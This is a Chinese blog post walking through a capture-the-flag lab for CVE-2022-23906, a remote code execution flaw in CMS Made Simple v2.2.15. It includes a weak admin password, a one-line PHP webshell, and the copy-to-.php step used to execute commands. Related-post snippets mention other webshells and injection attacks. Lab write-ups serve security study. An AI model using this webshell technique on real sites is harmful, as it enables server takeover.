春秋云境:CVE-2022-23906

已于 2024-03-08 12:59:02 修改
阅读量1.1k 收藏 3
点赞数
分类专栏: 春秋云境-靶场 文章标签: 安全 web安全 安全漏洞 网络安全 系统安全
于 2022-12-06 20:34:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/128209705
版权

春秋云境:CVE-2022-23906

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】查看更多内容……

CMS Made Simple v2.2.15 RCE:CVE-2022-23906

在这里插入图片描述

漏洞介绍

CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。

解题步骤

  1. 访问后台登录URL,通过弱口令登录后台:admin/123456
    在这里插入图片描述

  2. 通过图中位置进行图片上传文本格式的shell文件,比如1.txt,内容为:

<?php
system($_GET[1]);
phpinfo();
?>

在这里插入图片描述

  1. 上传成功后,选中此文件,并点击上方的copy进行复制,复制的文件名为:testshell.php
    在这里插入图片描述
    在这里插入图片描述

  2. 访问上传后的testshell.php,并执行命令查看flag:
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

Acczdy
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云境】文件上传漏洞合集
最新发布
qq_45755193的博客
04-25 893
使用工具:burpsuite使用工具:brupsuite进入/admin/do目录,弱口令为admin/admin888谷歌翻译一下:在这里新增php文件类型php//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyondif(!for($i=0;登录/admin,弱口令admin/123登录文件管理,编辑任意php文件为木马,冰蝎连接得到flag:不登录,直接选择Admin。
[春秋云镜]CVE-2022-23906
niubi707的博客
11-30 1392
春秋靶场 CMS Made Simple v2.2.15 RCE
春秋云境CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
果粒程
12-03 677
春秋云境CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
春秋云镜 CVE-2022-23906
qq_22002773的博客
07-09 188
春秋云镜 CVE-2022-23906
[春秋云镜]CVE-2022-23906 CMS Made Simple v2.2.15 RCE
b1n的博客
08-23 190
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 6338
春秋云境系列靶场记录合集,不更新了哈……
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
CMS Made Simple CMSMS内容管理系统 v2.2.15
11-03
为您提供CMS Made Simple CMSMS内容管理系统下载,CMS Made Simple(CMSMS)是一个简单易于使用的内容管理系统,使用PHP,MySQL和Smarty模板引擎开发,具有基于角色的权限管理系统,智能缓存机制(只有当需要时才会从数据库获取),基于向导的安装与更新机制,对系统资源占用少,还包含文件管理,新闻发布和RSS模块等。使用CMS Made Simple(CMSMS)搭建一个站点,就如同它的名字—简单,但是对于那些热衷于
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5197
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
CMS Made Simple v2.2.15 RCE(CVE-2022-23906
qq_69432323的博客
07-23 820
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
春秋云境CVE-2022-23366靶场记录
2301_78019493的博客
05-19 1066
注入点在登陆处,登录用burp抓包放到sqlmap跑。
春秋云镜 CVE-2022-22963 靶场详细解析
m0_61256404的博客
05-23 505
春秋云镜 CVE-2022-22963 靶场详细解析,SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5433
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
CVE-2022-22965 漏洞复现学习
守拙的博客
04-30 2963
漏洞利用条件 JDK 9+ Spring 及其衍生框架 使用Tomcat部署spring项目 使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本 环境搭建 Java 靶场 JDK 11(必须9及9以上) Tomcat 8 首先需要个实体类 sdf sdf public class HelloWorld { private String message; public String getM

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值